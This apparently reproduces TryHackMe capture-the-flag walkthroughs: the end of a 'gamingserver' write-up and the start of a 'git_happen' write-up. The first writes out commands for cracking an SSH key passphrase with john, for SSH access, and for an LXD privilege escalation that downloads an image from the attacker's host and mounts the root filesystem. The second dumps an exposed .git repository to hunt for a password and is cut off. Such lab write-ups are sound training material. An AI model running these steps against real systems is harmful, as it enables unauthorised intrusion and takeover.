256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519) 9 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 10 | |_http-server-header: Apache/2.4.29 (Ubuntu) 11 | |_http-title: House of danak 12 | ``` 13 | - gobuster 14 | ``` 15 | /about.php (Status: 200) 16 | /about.html (Status: 200) 17 | /index.html (Status: 200) 18 | /robots.txt (Status: 200) 19 | /robots.txt (Status: 200) 20 | /secret (Status: 301) 21 | /server-status (Status: 403) 22 | /uploads (Status: 301) 23 | ``` 24 | 25 | - port 80 httpserver 26 | - index.html: `` 27 | - where is `/arhives.html` 28 | - /uploads/dict.lst: a password list 29 | - /secret: contain RSA key encrypted with AES 30 | 31 | 32 | # foot hold 33 | so as you can see, we got a password list + ssh key (RSA) encrypted with AES. I guess one of the password in the list (`/uploads/dict.lst`) can be use to decrypt the ssh key. We can then use ssh key to gain foot hold one victim server. 34 | 35 | let start with convert encrypted ssh key to a format that john can understand. then use john to crack the password. we will use as our password list. 36 | ```console 37 | kali@kali:~/THM/gamingserver$ sudo python /usr/share/john/ssh2john.py secretKey s > ssh2john.txt 38 | kali@kali:~/THM/gamingserver$ sudo john --wordlist=dict.lst ssh2john.txt 39 | . 40 | . 41 | Press 'q' or Ctrl-C to abort, almost any other key for status 42 | (secretKey) 43 | 1g 0:00:00:00 DONE (2020-09-02 14:47) 100.0g/s 22200p/s 22200c/s 22200C/s 2003..starwars 44 | ``` 45 | now lets use to `openssl` to decrypt `secretKey` 46 | ```console 47 | kali@kali:~/THM/gamingserver$ openssl rsa -in secretKey -out gamingserver_key 48 | Enter pass phrase for secretKey: 49 | writing RSA key 50 | ``` 51 | what are we waiting for let ssh to the victim server. Grab the user flag 52 | ```console 53 | kali@kali:~/THM/gamingserver$ ssh john@$IP -i gamingserver_key 54 | Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10 55 | john@exploitable:~$ ls 56 | user.txt 57 | ``` 58 | # root 59 | ```console 60 | john@exploitable:~$ id 61 | uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd) 62 | ``` 63 | lxd !! I have seen it so many time. if you dont know what LXD is pls do some research by yourself, Also check this for step by step lxd exploit [link](https://www.hackingarticles.in/lxd-privilege-escalation/) 64 | 65 | 66 | so what are we waiting for. let get root!! 67 | 68 | ```console 69 | john@exploitable:~$ wget http://:8080/myalpine.tar.gz 70 | 2020-09-02 19:04:23 (1.01 MB/s) - ‘myalpine.tar.gz’ saved [3199169/3199169] 71 | john@exploitable:~$ ls 72 | myalpine.tar.gz user.txt 73 | john@exploitable:~$ lxc image import myalpine.tar.gz --alias kurohat 74 | Image imported with fingerprint: 19d278b8c78857a750fb2589c3addb3fa4a4b11fbb2c2b28275400e3a60fbb79 75 | john@exploitable:~$ lxc init kurohat ignite -c security.privileged=true 76 | Creating ignite 77 | john@exploitable:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true 78 | Device mydevice added to ignite 79 | john@exploitable:~$ lxc start ignite 80 | john@exploitable:/mnt$ lxc exec ignite /bin/sh # bash will also work but this server do not have /bin/bash 81 | ~ # id 82 | uid=0(root) gid=0(root) 83 | ``` 84 | now let move to the mount poin `/mnt/root/` and grab the root flag -------------------------------------------------------------------------------- /TryHackMe/Easy/git_happen.md: -------------------------------------------------------------------------------- 1 | # recon 2 | # nmap 3 | ``` 4 | 80/tcp open http 5 | Enumerating open ports... 6 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 16:58 EDT 7 | Nmap scan report for 10.10.74.55 8 | Host is up (0.045s latency). 9 | 10 | PORT STATE SERVICE VERSION 11 | 80/tcp open http nginx 1.14.0 (Ubuntu) 12 | | http-git: 13 | | 10.10.74.55:80/.git/ 14 | | Git repository found! 15 | |_ Repository description: Unnamed repository; edit this file 'description' to name the... 16 | |_http-server-header: nginx/1.14.0 (Ubuntu) 17 | |_http-title: Super Awesome Site! 18 | ``` 19 | as you can see, nmap found `.git/` 20 | # gobuster 21 | - `/dashboard.html` (Status: 200) 22 | 23 | I see the page by using burp-suit. Normaly the web page going to redirect yo to `/index.html`. With burp-suit you can catch and not forward the redirect traffic. In this way you can annaly the page. But that is not the point, The goal of this room is get admin password 24 | - `/index.html` (Status: 200) 25 | 26 | 27 | # git-dumper 28 | dump `.git` so we can annalyze it on kali 29 | ```console 30 | $ ./git-dumper http://$IP/ /dump/it 31 | ``` 32 | now move to the directoy and run ```git log``` to read logs. to see more output in git console press `D` 33 | ``` 34 | commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0) 35 | Author: Adam Bertrand 36 | Date: Thu Jul 23 22:22:16 2020 +0000 37 | 38 | Update .gitlab-ci.yml 39 | 40 | commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d 41 | Author: Hydragyrum 42 | Date: Fri Jul 24 00:21:25 2020 +0200 43 | 44 | add gitlab-ci config to build docker file. 45 | 46 | commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199 47 | Author: Hydragyrum 48 | Date: Fri Jul 24 00:08:38 2020 +0200 49 | 50 | setup dockerfile and setup defaults. 51 | 52 | commit d6df4000639981d032f628af2b4d03b8eff31213 53 | Author: Hydragyrum 54 | Date: Thu Jul 23 23:42:30 2020 +0200 55 | 56 | Make sure the css is standard-ish! 57 | 58 | commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d 59 | Author: Hydragyrum 60 | Date: Thu Jul 23 23:41:12 2020 +0200 61 | 62 | re-obfuscating the code to be really secure! 63 | 64 | commit bc8054d9d95854d278359a432b6d97c27e24061d 65 | Author: Hydragyrum 66 | Date: Thu Jul 23 23:37:32 2020 +0200 67 | 68 | Security says obfuscation isn't enough. 69 | 70 | They want me to use something called 'SHA-512' 71 | 72 | commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1 73 | Author: Hydragyrum 74 | Date: Thu Jul 23 23:25:52 2020 +0200 75 | 76 | Obfuscated the source code. 77 | 78 | Hopefully security will be happy! 79 | 80 | commit 395e087334d613d5e423cdf8f7be27196a360459 81 | Author: Hydragyrum 82 | Date: Thu Jul 23 23:17:43 2020 +0200 83 | 84 | Made the login page, boss! 85 | 86 | commit 2f423697bf81fe5956684f66fb6fc6596a1903cc 87 | Author: Adam Bertrand 88 | Date: Mon Jul 20 20:46:28 2020 +0000 89 | 90 | Initial commit 91 | ``` 92 | by examine the logs you will find an interesting commit with the message `Made the login page, boss!`. To check the change on that commin run `git show ` 93 | 94 | ```console 95 | git show 395e087334d613d5e423cdf8f7be27196a360459 96 | ``` 97 | now let looks for password 98 | ``` 99 |